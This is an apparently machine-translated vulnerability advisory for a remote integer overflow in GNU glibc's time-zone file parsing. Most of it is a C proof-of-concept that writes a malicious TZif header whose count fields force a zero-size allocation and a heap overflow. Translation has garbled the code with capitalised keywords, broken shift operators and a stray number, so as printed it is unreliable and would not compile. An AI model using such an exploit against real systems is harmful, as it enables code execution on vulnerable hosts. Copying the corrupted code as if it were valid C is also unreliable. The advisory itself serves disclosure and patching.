GNU glibc Time Zone Parsing Remote Integer Overflow Vulnerability

Release date:
Updated on:

Affected Systems:
GNU glibc
Description:
--------------------------------------------------------------------------------
Bugtraq id: 50898

Glibc is the implementation of C libraries in most Linux operating systems.

GNU glibc has a remote Integer Overflow Vulnerability. Attackers can exploit this vulnerability to execute arbitrary code with the current user permission.

<* Source: dividead

Link: https://bugzilla.redhat.com/show_bug.cgi? Id = 761245
*>

Test method:
--------------------------------------------------------------------------------
Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

Dividead () provides the following test methods:

# Include <stdio. h>
# Include <stdint. h>
# Include <time. h>
# Include <string. h>

# Define TZ_MAGIC "TZif"

# Define PUT_32BIT_MSB (cp, value )\
Do {\
(Cp) [0] = (value)> 24 ;\
(Cp) [1] = (value)> 16 ;\
(Cp) [2] = (value)> 8 ;\
(Cp) [3] = (value );\
} While (0)

Struct tzhead {
Char tzh_magic [4];
Char tzh_version [1];
Char tzh_reserved [15];
Char tzh_ttisgmtcnt [4];
Char tzh_ttisstdcnt [4];
Char tzh_leapcnt [4];
Char tzh_timecnt [4];
Char tzh_typecnt [4];
Char tzh_charcnt [4];
};

Struct ttinfo
{
Long int offset;
Unsigned char isdst;
Unsigned char idx;
Unsigned char isstd;
Unsigned char isgmt;
};
Int main (void)
{
Struct tzhead edevil;
Int I;
Char * p;
42
Uint32_t total_size;
Uint32_t evil1, evil2;

/* Initialize static part of the header */
Memcpy (edevil. tzh_magic, TZ_MAGIC, sizeof (TZ_MAGIC)-1 );
Edevil. tzh_version [0] = 0;
Memset (edevil. tzh_reserved, 0, sizeof (edevil. tzh_reserved ));
Memset (edevil. tzh_ttisgmtcnt, 0, sizeof (edevil. tzh_ttisgmtcnt ));
Memset (edevil. tzh_ttisstdcnt, 0, sizeof (edevil. tzh_ttisstdcnt ));
Memset (edevil. tzh_leapcnt, 0, sizeof (edevil. tzh_leapcnt ));
Memset (edevil. tzh_typecnt, 0, sizeof (edevil. tzh_typecnt ));

/* Initialize nasty part of the header */
Evil1 = 500;
PUT_32BIT_MSB (edevil. tzh_timecnt, evil1 );

Total_size = evil1 * (sizeof (time_t) + 1 );
Total_size = (total_size + _ alignof _ (struct ttinfo)-1)
&~ (_ Alignof _ (struct ttinfo)-1 ));

/* Value of chars, to get a malloc (0 )*/
Evil2 = 0-total_size;
PUT_32BIT_MSB (edevil. tzh_charcnt, evil2 );
P = (char *) & edevil;
For (I = 0; I <sizeof (edevil); I ++)
Printf ("% c", p [I]);

/* Data we overflow */
For (I = 0; I <50000; I ++)
Printf ("");
}

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

GNU
---
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:

Http://www.gnu.org